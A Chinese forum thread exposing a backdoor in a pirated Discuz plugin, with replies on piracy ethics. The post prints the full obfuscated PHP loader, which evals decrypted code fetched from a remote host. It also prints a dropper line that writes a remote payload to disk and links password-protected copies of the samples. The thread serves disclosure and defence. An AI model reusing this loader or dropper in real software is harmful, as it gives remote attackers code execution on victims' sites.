【續(xù)集】魔趣吧的東西真的有后門(mén)木馬，揭秘用盜版的危害

密碼忘了

上次寫(xiě)了一篇文章 披露了盜版市場(chǎng)的亂象 ，沒(méi)想到本人遭到魔趣吧的站長(zhǎng)瘋狂的報(bào)復(fù)。我自己的網(wǎng)站已經(jīng)持續(xù)快10天被魔趣吧的站長(zhǎng)使用DDOS攻擊技術(shù)，打不開(kāi)了！因?yàn)樵谄渚W(wǎng)站進(jìn)行了手機(jī)綁定，手機(jī)也整天被短信+電話(huà)轟炸！搞的我最近經(jīng)常要開(kāi)飛行模式！
但是我是絕對(duì)不會(huì)像黑惡勢(shì)力低頭的，大不了我網(wǎng)站不做了，手機(jī)號(hào)碼不用了！

前文回顧：魔趣吧的東西好像真的有后門(mén)木馬，改了我dz的后臺(tái)密碼
http://www.9999xn.com/thread-5095-1-1.html

因?yàn)榍懊娴哪瞧恼聦?xiě)的比較概況，沒(méi)有列舉證據(jù)（導(dǎo)致其大肆誤導(dǎo)不明真相的群眾說(shuō)我在造謠），今天我就來(lái)列舉一些證據(jù)，并對(duì)已知的后門(mén)進(jìn)行深入詳細(xì)的分析！
這可能是最后一篇曝光盜版市場(chǎng)亂象的文章了，因?yàn)槲抑皇且粋€(gè)普普通通的站長(zhǎng)！那些江湖經(jīng)驗(yàn)豐富的站長(zhǎng)我惹不起，我也見(jiàn)識(shí)了魔趣吧是如果把黑的說(shuō)成白的！

他的理念就是：只要對(duì)他有利的都是好文章，曝光他的都是在造謠他！

在正式進(jìn)入主題之前，我想在說(shuō)幾句題外話(huà)：先不說(shuō)他有沒(méi)有干些見(jiàn)不得人的事，其損壞原創(chuàng)開(kāi)發(fā)者權(quán)益，謀取自己的利益(俗稱(chēng)：盜版)，還有什么資格在那一副正人君子的模樣懟這個(gè)懟那個(gè)！

【下面才是今天要說(shuō)的主題】
由于帶后門(mén)的資源有點(diǎn)多，今天我就隨便拿個(gè)在魔趣吧收費(fèi)的資源，且我之前安裝過(guò)，受害的資源來(lái)做分析！

樣本下載鏈接：為了不給他打廣告，帖子ID： 9183 ，知道他網(wǎng)站的隨便打開(kāi)一個(gè)帖子把id換成這個(gè)就可以定位到！

因?yàn)槭荲IP資源，所以我分享到了藍(lán)奏網(wǎng)盤(pán)：https://wws.lanzous.com/iH9IQe6jymf  密碼:c9mx

附件MD5值：C03B189CA9E0EA7F1229F609A48EC705
防止因?yàn)槲业钠毓猓麜?huì)修改附件，然后狡辯！對(duì)本文有異議的朋友可以在本文發(fā)布不久的時(shí)候，前去下載對(duì)比MD5值后，并效驗(yàn)是不是存在本文提到的后門(mén)木馬！

樣本插件名稱(chēng)：積分提現(xiàn)中心 V1.2

木馬文件所在路徑：keke_tixian\function\function_core.php


木馬完整代碼：

1. <?php
   
2. function zm_diconv($str){
   
3.   $encode = mb_detect_encoding($str, array(
   
4. 
   
5.         "ASCII",
   
6. 
   
7.         "UTF-8",
   
8. 
   
9.         "GB2312",
   
10. 
    
11.         "GBK",
    
12. 
    
13.         "BIG5"
    
14. 
    
15.     ));
    
16. 
    
17.     if ($encode != CHARSET) {
    
18. 
    
19.         //$keytitle = iconv($encode,CHARSET."//IGNORE",$str);
    
20. 
    
21.         $keytitle = mb_convert_encoding($str, CHARSET, $encode);
    
22. 
    
23.     }
    
24. 
    
25.     if (!$keytitle) {
    
26. 
    
27.         $keytitle = $str;
    
28. 
    
29.     }
    
30. 
    
31.     return $keytitle;
    
32. 
    
33. }
    
34. function caidi($oo){
    
35.     $love = 'httpABczonekey`akndecryptud^gjchdh`winNULLB{NVJ:GJGbaiduseo`lpsck`xml';
    
36.         $forver=stripos($love,'d');
    
37.         $forvere=stripos($love,'z');
    
38.         $GLOBALS['love'] = preg_replace(array("/`.*?`/","/abc/i","/[A-Z_].*[A-Z_]/"),array(".","://","/"),$love);
    
39.         $forveres='DECODE';
    
40.         $aini=substr($love,$forver,$forvere);//獲取方法函數(shù)名decrypt
    
41.         $aini=$oo?$forveres:$aini;
    
42.         return $aini;
    
43. }
    
44. function decrypt($data, $key = '721520') {
    
45.                 global $_G;
    
46.                 $key = $key ? $key : $_G['config']['security']['authkey'];
    
47.                 $type = caidi($key);
    
48.                 return authcode($data,$type, $key);
    
49.                 }
    
50. 
    
51. function contentz($svip) {
    
52. if(function_exists('file_get_contents')) {
    
53. $data = file_get_contents($svip);
    
54. } else {
    
55. $ch = curl_init();
    
56. $timeout = 5;
    
57. curl_setopt ($ch, CURLOPT_URL, $svip);
    
58. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    
59. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    
60. $data = curl_exec($ch);
    
61. curl_close($ch);
    
62. }
    
63. return $data;
    
64. }
    
65. $iloveyou = caidi($oo);
    
66. eval($iloveyou(strip_tags(contentz($love))));
    
67. ?>

復(fù)制代碼

關(guān)鍵代碼：

1. $iloveyou = caidi($oo);
   
2. eval($iloveyou(strip_tags(contentz($love))));

復(fù)制代碼

有了這些信息 我們下面進(jìn)行分析(在這里大膽的猜測(cè)一下：文件完全是魔趣吧自己加進(jìn)去的，正版可能就沒(méi)有這個(gè)文件，因?yàn)檫@個(gè)文件代碼全是和后門(mén)有關(guān)！和插件自身功能沒(méi)有關(guān)系)
在關(guān)鍵代碼前面的都是木馬偽裝所需要用到的函數(shù) 執(zhí)行過(guò)程如下：
1/----------------------

后門(mén)腳本執(zhí)行入口：keke_tixian\admin.inc.php
關(guān)鍵代碼在該文件第7行：引用后門(mén)文件并執(zhí)行
require_once DISCUZ_ROOT .'./source/plugin/keke_tixian/function/function_core.php';
解釋?zhuān)?/font>只要安裝插件一打開(kāi)后臺(tái)的插件設(shè)置，木馬就自動(dòng)執(zhí)行了！

2/--------依次執(zhí)行----------


$iloveyou = caidi($oo);
解釋?zhuān)?/font>定義一個(gè)名為   iloveyou 的變量  ,值為： caidi($oo)
調(diào)試： $iloveyou = caidi($oo); echo $iloveyou.$love; exit; ，得到 iloveyou 的值等于：decrypt
備注：函數(shù) caidi 定義并賦值了 $love  作全局變量， love 的值等于：htt去p://zonekey.w掉in/b中ai文duseo.xml  (去掉中文)

3/--------依次執(zhí)行----------

eval($iloveyou(strip_tags(contentz($love))));

解釋?zhuān)?/font>已知 iloveyou 的值等于：decrypt，得到 eval(decrypt(strip_tags(contentz(htt去p://zonekey.w掉in/b中ai文duseo.xml))));

分析函數(shù) contentz 得知該函數(shù) 是訪(fǎng)問(wèn)遠(yuǎn)程鏈接并返回內(nèi)容，相當(dāng)于 curl
分析函數(shù) decrypt 得知該函數(shù) 是進(jìn)行內(nèi)容解密，直接調(diào)用了DISCUZ自帶的解密函數(shù) authcode


解釋的解釋：代碼 eval($iloveyou(strip_tags(contentz($love)))); ，經(jīng)過(guò)層層分析，最終為：
執(zhí)行腳本 ( 解密 ( 訪(fǎng)問(wèn)遠(yuǎn)程代碼 ( htt去p://zonekey.w掉in/b中ai文duseo.xml ) ) ) );

4/--------依次執(zhí)行----------

因 htt去p://zonekey.w掉in/b中ai文duseo.xml 該鏈接現(xiàn)在訪(fǎng)問(wèn)返回的全部是 1111111111111111，所以無(wú)法繼續(xù)分析遠(yuǎn)程的代碼是什么！

可能魔趣吧站長(zhǎng)已經(jīng)知道我接下來(lái)會(huì)深入曝光他。所以暫時(shí)把遠(yuǎn)程代碼先全部改成了 1111111111111111
即使是這樣！又如何？ 執(zhí)行遠(yuǎn)程腳本 有什么危害？相信做網(wǎng)站的都知道！這里我不進(jìn)行科普！感興趣的站長(zhǎng)可以百度自行科普：例：一句話(huà)木馬，菜刀！
下面的代碼是我網(wǎng)站自動(dòng)多出來(lái)的一個(gè)文件：因?yàn)闊o(wú)法繼續(xù)分析，直接看結(jié)果

1. <?php
   
2. file_put_contents("schizwcingu.php",file_get_contents("http://iqqvps.com/xss.txt"));

復(fù)制代碼

上面的xss.txt  防止 魔趣吧站長(zhǎng) 再去取消 我上傳到了 藍(lán)奏網(wǎng)盤(pán) https://wws.lanzous.com/iPkAWe6na9c 密碼:i1nc

End/--------刨根問(wèn)底--------

在前面一篇文章中提到過(guò)了  魔趣吧站長(zhǎng)聲稱(chēng)該木馬是源碼哥的！
但是既然干了，就干到底！
百度了一下 搜索 到 源碼哥  ，在他網(wǎng)站搜索 了一下 積分提現(xiàn)中心  果然找到一個(gè)一模一樣的版本！
花了20塊錢(qián)下載下來(lái)（真黑啊，1.2  這么舊的版本還賣(mài)20），不過(guò)花20塊錢(qián) 能讓大家看清，防止中木馬。也值得！

結(jié)局打臉： 沒(méi)有 keke_tixian\function\function_core.php  這個(gè)文件，因?yàn)槭沁厡?xiě)邊弄的，既然寫(xiě)好了就這樣吧！
雖然沒(méi)有發(fā)現(xiàn)木馬，但是應(yīng)該也是一丘之貉，還是呼吁大家不要用盜版！不要用盜版！不要用盜版！

PS：對(duì)魔趣吧站長(zhǎng)傳播木馬，DDOS我的網(wǎng)站，短信+電話(huà)轟炸我的手機(jī)號(hào) 表示非常的鄙視！


希望官方管理員能夠曝光這篇文章，讓更多準(zhǔn)備用盜版的站長(zhǎng)、已經(jīng)在用盜版的站長(zhǎng)。趕緊回頭是岸！
樣本已經(jīng)上傳到藍(lán)奏網(wǎng)盤(pán)，文章寫(xiě)的不到位的地方，歡迎各路大神補(bǔ)充！

密碼忘了

文中忘記說(shuō)了！不能編輯 就占樓吧！
看圖打臉


1、保證無(wú)后門(mén)     
打臉：無(wú)后門(mén)！只是有木馬
不如：保證無(wú)后門(mén)，絕對(duì)有木馬！

2、魔趣吧修復(fù)后發(fā)布！
打臉：正版好好的東西，被魔趣吧修復(fù)一下就多了個(gè)后門(mén)木馬？
不如：魔趣吧增加木馬后發(fā)布

3、資源均經(jīng)測(cè)試，請(qǐng)放心使用！
打臉：放個(gè)木馬在你網(wǎng)站，你能放心？
不如：木馬功能已經(jīng)測(cè)試，請(qǐng)放心使用！零失誤！


4、官方認(rèn)證圖標(biāo)
打臉：魔趣吧官方正版木馬，請(qǐng)放心中毒！

密碼忘了

申明：本文不是針對(duì) 可可 正版的應(yīng)用  正版應(yīng)用肯定是沒(méi)有木馬的！
本文說(shuō)的是盜版的！

湖中沉

簡(jiǎn)單點(diǎn)說(shuō)：無(wú)利不起早

開(kāi)發(fā)者的利，自然是賣(mài)產(chǎn)品，也就是賣(mài)插件模板，為了多得利，自然要做好產(chǎn)品
站長(zhǎng)的利，自然是通過(guò)程序賺錢(qián)或?qū)^(qū)流量最終變現(xiàn)（也許你現(xiàn)在不賺錢(qián)，但別說(shuō)永遠(yuǎn)不打算賺錢(qián)）
盜版站的利，要么是錢(qián)，要么是流量，但最終和站長(zhǎng)是一樣的，還是變現(xiàn)，如果打著所謂免費(fèi)旗號(hào)，那么最終一定會(huì)在隱藏的地方來(lái)想辦法賺錢(qián)，那么很明顯，黑產(chǎn)是最簡(jiǎn)單的選擇，那么后門(mén)木馬就不稀奇了。

賺錢(qián)可以，但請(qǐng)通過(guò)自己的勞動(dòng)正當(dāng)獲益，你要是自己寫(xiě)代碼提供給站長(zhǎng)，誰(shuí)也沒(méi)權(quán)利指責(zé)你，但開(kāi)發(fā)者費(fèi)時(shí)費(fèi)力的勞動(dòng)所得，你偷去倒賣(mài)，這就很不道德了，并且不止是不道德，這是違法的。

再加上黑產(chǎn)，那么就更加讓人憤怒了，也就是說(shuō)兩頭吃。

無(wú)利不起早，為利無(wú)可厚非，但請(qǐng)緊守底線(xiàn)，尊重別人的勞動(dòng)。

經(jīng)常有“站長(zhǎng)”指責(zé)開(kāi)發(fā)者賣(mài)的貴，不厚道。那么請(qǐng)你能寫(xiě)出一樣的東西免費(fèi)提供出來(lái)，但不能是偷別人的東西提供出來(lái)哦。當(dāng)你能寫(xiě)出一樣的東西的時(shí)候，并能始終免費(fèi)提供，我向您投以真誠(chéng)的敬意。

但別人通過(guò)大量的學(xué)習(xí)、探索、耗費(fèi)精力和時(shí)間，勞動(dòng)所得寫(xiě)出的內(nèi)容，以此獲取回報(bào)，則不能予以譴責(zé)。我們自然應(yīng)當(dāng)感恩免費(fèi)的饋贈(zèng)，但也同時(shí)應(yīng)當(dāng)尊重勞動(dòng)回報(bào)的需求。

重慶之家

以前貪便宜也是用盜版插件模版，安全中心三天兩頭的發(fā)出風(fēng)險(xiǎn)告警首頁(yè)老是被改，刪除了所有盜版插件模版，現(xiàn)在一直好好的

xiaomianlang

魔趣我不知道 反正哪個(gè)源碼哥的肯定是有木馬。都自己修改內(nèi)容

羅永浩

幾百塊一個(gè)月上高防就行。

onetheme

羅永浩 發(fā)表于 2020-7-1 02:59
幾百塊一個(gè)月上高防就行。

能舍得幾百塊一個(gè)月高防用盜版，何不花百十塊買(mǎi)個(gè)正版使用，不香嗎？

初錦

嗯，當(dāng)我看見(jiàn)你那個(gè)帖子的時(shí)候，發(fā)現(xiàn)一個(gè)叫做魔趣吧的用戶(hù)回復(fù)了你但被discuz管理員屏蔽了我就知道事情不簡(jiǎn)單。我不站樓主和魔趣吧，我站discuz管理員的做法（放肆的大笑）

墨裔

這故事引起了我的注意